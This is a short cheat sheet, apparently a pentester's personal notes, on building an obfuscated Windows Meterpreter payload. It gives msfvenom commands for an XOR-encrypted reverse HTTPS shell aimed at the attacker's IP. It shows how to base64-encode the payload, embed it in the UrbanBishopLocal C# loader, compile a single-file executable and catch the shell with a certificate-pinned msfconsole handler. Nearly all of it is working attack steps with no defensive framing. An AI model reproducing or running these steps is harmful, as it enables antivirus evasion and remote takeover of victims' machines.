Some Usefull tools and specific modus operanti to obfuscate payload
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=<OurIPADRESS> LPORT=443 --encrypt xor --encrypt-key <helloworld> --format raw > testf
are the key but we can write what we want.
hexdump -v -e '"\\""x" 1/1 "%02x" ""' <testf>
base64 <testf> > <newtest>
openssl req -newkey rsa:4096 \
-x509 \
-sha256 \
-days 3650 \
-nodes \
-out example.crt \
-keyout example.key
- Concatenate two files in one
example.key & example.crt > example.pem
- https://github.com/slyd0g/UrbanBishopLocal
on windows machine install git, netcore and vscode, in the vscode install the c# extension
dotnet new console -o <nameofproject>
cd <nameofproject>
code . (allowing to open the progam.cs in vscode directly)
--> in this part we will make a copy of the code in the UrbanBishopLocal folder which named program.cs --> it's template to make the obfuscation of our payload (just copy our base64 code at the end progam.cs), but also we specified the same key which we are defined in the msfvenom part.
dotnet build
But if you want the compilation in one file only you can run that:
dotnet publish -r win-x64 -c Release /p:PublishSingleFile=true
msfconsole
use exploit/multi/handler
set HandlerSSLCert </home/PATH/TO/THE/example.pem> (of the key we are generate earlier)
set StagerVerifySSLCert true
set LHOST <ourIPADRESS>
set LPORT 443
exploit